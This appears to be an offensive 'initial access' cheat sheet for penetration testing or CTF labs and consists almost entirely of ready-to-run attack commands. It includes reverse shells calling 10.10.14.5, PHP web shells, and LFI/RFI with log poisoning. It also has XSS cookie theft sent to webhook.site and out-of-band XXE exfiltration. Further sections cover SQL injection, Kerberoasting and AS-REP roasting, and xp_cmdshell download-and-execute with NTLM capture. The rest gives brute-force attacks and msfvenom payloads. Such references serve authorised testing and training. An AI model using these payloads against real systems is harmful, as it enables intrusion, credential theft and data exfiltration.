Web exploitation, credential attacks, payload delivery, and service abuse. Getting that first shell is everything.
Source code, robots.txt, headers, CMS fingerprinting.
SQLi, LFI, RFI, XSS, XXE, Kerberoasting, MSSQL.
msfvenom payloads, web shells, SMB/FTP drops.
Catch reverse shell, upgrade TTY, stabilise.
# Source code — grep for secrets
curl -s https://target.com | grep -iE "comment|TODO|password|api_key|secret"
# robots.txt and sitemap
curl https://target.com/robots.txt
curl https://target.com/sitemap.xml
# Fingerprint server stack
whatweb -v -a 3 https://target.com
curl -I https://target.com | grep -iE "Server:|X-Powered-By:|Set-Cookie:|X-Generator:"
# Nikto — automated scanner
nikto -h https://target.com -o nikto_out.txt -Format txt
# Extract hidden API endpoints from JS files
curl https://target.com/app.js | grep -oE '"(/[a-zA-Z0-9/_-]+)"' | sort -u
| Header | Reveals |
|---|---|
Server: Apache/2.4.41 | OS + server version |
X-Powered-By: PHP/7.4.3 | Language stack |
Set-Cookie: PHPSESSID | PHP backend |
Set-Cookie: JSESSIONID | Java backend |
X-Generator: WordPress 5.8 | CMS + version |
# Enumerate users, vulnerable plugins/themes
wpscan --url https://target.com --enumerate u,vp,vt,dbe \
--api-token YOUR_TOKEN -o wpscan.txt
# Brute force discovered users
wpscan --url https://target.com --usernames admin,editor \
-P /usr/share/wordlists/rockyou.txt --password-attack wp-login
# Hydra — brute force wp-login.php
hydra -l admin -P rockyou.txt target.com \
http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:ERROR"
# Searchsploit — offline exploit-db search
searchsploit wordpress 5.8
searchsploit "plugin-name 2.3.1"
searchsploit -m php/webapps/12345.py
# Drupal
droopescan scan drupal -u https://target.com
# Joomla
joomscan -u https://target.com
# Multi-CMS scanner
cmsmap https://target.com
# SQLmap — GET parameter
sqlmap -u "https://target.com/page?id=1" --dbs --batch --level 3 --risk 2
# SQLmap — POST via Burp request file
sqlmap -r request.txt --dbs --batch --dbms=mysql
# Dump specific table
sqlmap -r request.txt -D target_db -T users --dump
# OS shell (if DB user has FILE privilege)
sqlmap -r request.txt --os-shell
' OR 1=1-- | ' OR '1'='1 | 1; SELECT sleep(5)-- | 1' AND 1=2 UNION SELECT null,null,null--
# Test payloads in parameters
; id
| id
` id `
$(id)
%0a id
# Reverse shells
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
nc -e /bin/bash 10.10.14.5 4444
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
# Catch
nc -lvnp 4444
# Basic traversal
?page=../../../../etc/passwd
?page=....//....//....//etc/passwd
?page=%2F%2F%2F%2F%2Fetc%2Fpasswd
# PHP filter — base64 encode file contents
?page=php://filter/convert.base64-encode/resource=/etc/passwd
echo "BASE64STRING" | base64 -d
# SSH keys
?page=../../../../root/.ssh/id_rsa
?page=../../../../home/user/.ssh/id_rsa
# Log poisoning (Apache) — inject PHP into User-Agent then include log
curl -A "<?php system(\$_GET['cmd']); ?>" https://target.com
?page=../../../../var/log/apache2/access.log&cmd=id
# Host malicious PHP
echo '<?php system($_GET["cmd"]); ?>' > shell.php
python3 -m http.server 80
# Include via parameter
?page=http://10.10.14.5/shell.php&cmd=id
# Upgrade to reverse shell
?page=http://10.10.14.5/shell.php&cmd=bash+-i+>%26+/dev/tcp/10.10.14.5/4444+0>%261
nc -lvnp 4444
// Basic reflection test
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><script>alert(1)</script>
// Cookie theft
<script>fetch('https://webhook.site/UUID?c='+document.cookie)</script>
<script>new Image().src='http://10.10.14.5/?c='+document.cookie</script>
// Catch stolen cookie
nc -lvnp 80
<!-- Basic XXE — read /etc/passwd -->
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>
<!-- OOB XXE (blind) — host evil.dtd -->
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://10.10.14.5/evil.dtd">%xxe;]>
<root/>
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://10.10.14.5/?d=%file;'>"> %eval; %exfil;
# List all SPNs in domain with impacket
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP
# Get service accounts with SPNs and their descriptions
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request-user svcMSSQL
# Enumerate SPNs via PowerShell (on Windows target)
setspn -T DOMAIN -Q */*
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# With BloodHound collection
.\SharpHound.exe -c All --zipfilename loot.zip
# Request ALL kerberoastable TGS tickets at once
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request \
-outputfile kerberoast_hashes.txt
# Request for specific service account
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP \
-request-user svcMSSQL -outputfile svc_hash.txt
# From Windows with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
.\Rubeus.exe kerberoast /user:svcMSSQL /outfile:svc_hash.txt
# Via Metasploit
use auxiliary/gather/get_user_spns
set RHOSTS DC_IP
set SMBUser user
set SMBPass password
run
# Crack — hashcat mode 13100 (RC4-HMAC)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
--rules-file /usr/share/hashcat/rules/best64.rule
# Crack with john
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
john --show kerberoast_hashes.txt
| Hash Mode | Encryption | Hashcat Flag |
|---|---|---|
| RC4-HMAC | Type 23 | -m 13100 |
| AES-128 | etype 17 | -m 19600 |
| AES-256 | etype 18 | -m 19700 |
# Once cracked — authenticate as service account
evil-winrm -i TARGET_IP -u svcMSSQL -p CrackedPass123
# Check what the service account can access
crackmapexec smb DC_IP -u svcMSSQL -p CrackedPass123 --shares
crackmapexec smb DC_IP -u svcMSSQL -p CrackedPass123 --sam
# Pass-the-hash if you have NTLM
crackmapexec smb TARGET_IP -u svcMSSQL -H NTLM_HASH --exec-method wmiexec -x whoami
# With credentials — enumerate accounts without preauth
GetNPUsers.py DOMAIN/ -dc-ip DC_IP -usersfile users.txt -no-pass -format hashcat
# No credentials needed — but need username list
GetNPUsers.py DOMAIN/ -dc-ip DC_IP -no-pass -usersfile users.txt
# Build username list from RPC/SMB
crackmapexec smb DC_IP -u '' -p '' --rid-brute > rid_output.txt
grep "SidTypeUser" rid_output.txt | awk '{print $6}' | cut -d'\' -f2 > users.txt
# BloodHound — find accounts with DONT_REQ_PREAUTH
MATCH (u:User {dontreqpreauth: true}) RETURN u.name
# PowerView on target
Get-DomainUser -PreauthNotRequired | select samaccountname
# Request AS-REP for all vulnerable users (no auth needed)
GetNPUsers.py DOMAIN/ -dc-ip DC_IP -no-pass -usersfile users.txt \
-format hashcat -outputfile asrep_hashes.txt
# Request for specific user
GetNPUsers.py DOMAIN/svc-alfresco -dc-ip DC_IP -no-pass \
-format hashcat -outputfile svc_asrep.txt
# From Windows — Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
.\Rubeus.exe asreproast /user:svc-alfresco /format:hashcat /outfile:asrep.txt
# Crack — hashcat mode 18200 (Kerberos AS-REP etype 23)
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt \
--rules-file /usr/share/hashcat/rules/best64.rule
# John
john --wordlist=/usr/share/wordlists/rockyou.txt asrep_hashes.txt
| Attack | Requires Auth | Hash Mode | Target |
|---|---|---|---|
| Kerberoasting | Yes (any domain user) | -m 13100 | Service accounts with SPN |
| AS-REP Roasting | No | -m 18200 | Users without preauth |
xp_cmdshell allows OS command execution directly from SQL queries when enabled (or re-enabled by a sysadmin).
# Nmap — detect MSSQL and version
nmap -p 1433 -sV -sC --script ms-sql-info,ms-sql-config,ms-sql-empty-password 10.10.10.1
# Impacket — connect with credentials
mssqlclient.py DOMAIN/user:password@TARGET_IP -windows-auth
mssqlclient.py sa:password@TARGET_IP
# Metasploit — auxiliary scanner
use auxiliary/scanner/mssql/mssql_login
set RHOSTS TARGET_IP
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
# CrackMapExec
crackmapexec mssql TARGET_IP -u user -p password
crackmapexec mssql TARGET_IP -u user -p password -q "SELECT @@version"
# Enumerate databases
SELECT name FROM sys.databases;
SELECT * FROM sys.tables;
# Check current user and roles
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT IS_MEMBER('db_owner');
-- Check if xp_cmdshell is enabled
EXEC sp_configure 'xp_cmdshell';
-- Enable xp_cmdshell (requires sysadmin)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- Execute OS commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'ipconfig';
EXEC xp_cmdshell 'net user';
EXEC xp_cmdshell 'dir C:\';
-- PowerShell reverse shell via xp_cmdshell
EXEC xp_cmdshell 'powershell -enc BASE64_ENCODED_REVERSE_SHELL';
-- Download and execute payload
EXEC xp_cmdshell 'certutil -urlcache -split -f http://10.10.14.5/shell.exe C:\Temp\shell.exe';
EXEC xp_cmdshell 'C:\Temp\shell.exe';
-- Enumerate linked servers
SELECT * FROM sys.servers;
EXEC sp_linkedservers;
-- Query linked server
SELECT * FROM OPENQUERY([LINKED_SERVER], 'SELECT @@version');
-- Execute xp_cmdshell on linked server
EXECUTE('EXEC xp_cmdshell ''whoami''') AT [LINKED_SERVER];
-- Double-hop through linked servers
EXECUTE('EXECUTE(''EXEC xp_cmdshell ''''whoami'''''' ) AT [SERVER_B]') AT [SERVER_A];
-- Impersonate another login (if IMPERSONATE granted)
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;
EXEC xp_cmdshell 'whoami';
-- Read a file (BULK INSERT)
CREATE TABLE temp_file (content VARCHAR(MAX));
BULK INSERT temp_file FROM 'C:\Windows\System32\drivers\etc\hosts'
WITH (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n');
SELECT * FROM temp_file;
DROP TABLE temp_file;
-- Write file using xp_cmdshell
EXEC xp_cmdshell 'echo test > C:\Temp\test.txt';
-- Write web shell (if web root is known)
EXEC xp_cmdshell 'echo <?php system($_GET["cmd"]); ?> > C:\inetpub\wwwroot\shell.php';
-- UNC path capture (NTLM hash theft with Responder running)
EXEC xp_dirtree '\\10.10.14.5\share';
responder -I tun0 -wrf then trigger xp_dirtree to capture service account Net-NTLMv2 hash for offline cracking.
curl -s https://target.com/.env
curl -s https://target.com/.git/HEAD
curl -s https://target.com/config.php.bak
curl -s https://target.com/wp-config.php~
curl -s https://target.com/database.sql
curl -s https://target.com/backup.zip
curl -s https://target.com/web.config
gobuster dir -u https://target.com \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt \
-x bak,env,sql,zip,tar.gz,old,swp
DB_PASSWORD, APP_KEY, SECRET_KEY, API_KEY, AWS_SECRET_ACCESS_KEY
# Dump exposed .git directory
git-dumper https://target.com/.git/ ./dumped_git
cd dumped_git
# View commit history
git log --oneline
# Show full diff of specific commit
git show <commit_hash>
# Search ALL commit diffs for secrets
git log -p | grep -iE "password|secret|api_key|token|credential|passwd"
# List files ever committed (including deleted)
git log --all --full-history -- "*.env"
git show HEAD~1:config.php
# Automated secret scanning
trufflehog git file://./dumped_git --only-verified
hydra -l admin -P rockyou.txt ssh://target.com -t 4
hydra -L users.txt -P passwords.txt ssh://target.com -t 4 -V
# Private key login
chmod 600 id_rsa
ssh -i id_rsa user@target.com
ftp target.com
# Username: anonymous / Password: blank
# Download everything
ftp> prompt off
ftp> recurse on
ftp> mget *
wget -r ftp://anonymous:anonymous@target.com/
hydra -l admin -P rockyou.txt ftp://target.com
crackmapexec smb target.com -u '' -p ''
crackmapexec smb target.com -u '' -p '' --rid-brute
crackmapexec smb target.com -u users.txt -p passwords.txt --continue-on-success
crackmapexec smb target.com -u admin -p Pass123 --shares
smbclient -N -L //target.com
smbclient //target.com/share -U admin%Pass123
smb> prompt off
smb> recurse on
smb> mget *
hydra -l administrator -P rockyou.txt rdp://target.com
xfreerdp /u:administrator /p:Password123 /v:target.com
rdesktop target.com
# Windows x64 stageless EXE Windows
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe
# Linux x64 stageless ELF Linux
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
# PHP reverse shell Web
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php
# ASP reverse shell (IIS) Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f asp -o shell.asp
# WAR file (Tomcat / JBoss) Web
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war -o shell.war
# Netcat listener
nc -lvnp 4444
# MSF multi/handler (staged payloads)
msfconsole -q
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
exploit -j
# Upgrade basic shell to fully interactive TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm
# Find cpassword in SYSVOL
find /mnt/sysvol -name "Groups.xml" 2>/dev/null
find /mnt/sysvol -name "*.xml" | xargs grep -l "cpassword"
# Decrypt
gpp-decrypt "AzVJmXh4VwDGP7BQkPMr+2KZS6Hm9qKZrHKJGQVkF..."
# CrackMapExec automated
crackmapexec smb target.com -u '' -p '' -M gpp_password
| Vulnerability | Tool | Key Flag / Pattern |
|---|---|---|
| SQLi GET | sqlmap | -u "url?id=1" --dbs |
| SQLi POST | sqlmap | -r request.txt --dbs |
| Kerberoasting | GetUserSPNs.py | -request -outputfile hashes.txt |
| AS-REP Roasting | GetNPUsers.py | -no-pass -usersfile users.txt |
| MSSQL RCE | mssqlclient.py | EXEC xp_cmdshell 'whoami' |
| WordPress | wpscan | --enumerate u,vp,vt |
| SSH bruteforce | hydra | -l user -P list ssh://target |
| SMB users | crackmapexec | --rid-brute |
| Git dump | git-dumper | https://target.com/.git/ ./out |
| GPP decrypt | gpp-decrypt | "<cpassword value>" |
| Rev shell catch | nc | -lvnp 4444 |
| LFI passwd | curl/browser | ?page=../../../../etc/passwd |
| Hash crack (Kerberoast) | hashcat | -m 13100 hashes.txt rockyou.txt |
| Hash crack (AS-REP) | hashcat | -m 18200 hashes.txt rockyou.txt |